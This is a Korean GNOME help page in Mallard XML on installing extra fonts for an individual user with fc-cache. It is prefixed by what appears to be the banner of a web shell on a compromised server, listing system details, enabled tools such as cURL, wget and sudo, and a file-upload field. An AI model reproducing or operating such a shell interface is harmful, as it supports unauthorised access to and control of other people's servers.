| Server IP : 172.67.134.114 / Your IP : 162.159.115.42 Web Server : Apache/2.4.37 System : Linux almalinux.duckdns.org 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64 User : ricodeal ( 1046) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/help/ko/system-admin-guide/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?>
<page xmlns="http://projectmallard.org/1.0/" xmlns:its="http://www.w3.org/2005/11/its" type="topic" style="task" id="fonts-user" xml:lang="ko">
<info>
<link type="guide" xref="appearance"/>
<revision pkgversion="3.11" date="2014-01-29" status="draft"/>
<credit type="author copyright">
<name>Matthias Clasen</name>
<email>[email protected]</email>
<years>2012</years>
</credit>
<credit type="editor">
<name>Jana Svarova</name>
<email>[email protected]</email>
<years>2013</years>
</credit>
<credit type="author copyright">
<name>Ekaterina Gerasimova</name>
<email>[email protected]</email>
<years>2013</years>
</credit>
<credit type="editor">
<name>Petr Kovar</name>
<email>[email protected]</email>
<years>2014</years>
</credit>
<include xmlns="http://www.w3.org/2001/XInclude" href="legal.xml"/>
<desc>개별 사용자를 위한 추가 글꼴을 추가하세요.</desc>
</info>
<title>개별 사용자를 위한 추가 글꼴 추가</title>
<p>글꼴 처리의 <sys>fontconfig</sys>를 사용하는 애플리케이션에서 시스템의 특정한 사용자들이 사용 가능한 추가 글꼴을 설치 할 수 있습니다.</p>
<steps>
<title>추가 글꼴 설치</title>
<item>
<p>글꼴 설치를 위해 <file>~/.local/share/fonts/</file>로 글꼴을 복사하세요.</p>
</item>
<item>
<p>글꼴 캐시를 업데이트 하기 위해 다음의 명령을 실행해야 할 것입니다:</p>
<screen><output>$ </output><input>fc-cache ~/.local/share/fonts</input></screen>
</item>
</steps>
<p>글꼴을 적용시키기 위해 실행 중인 애플리케이션을 재시작 해야 합니다. 사용자 세션은 다시 시작할 필요가 없습니다.</p>
</page>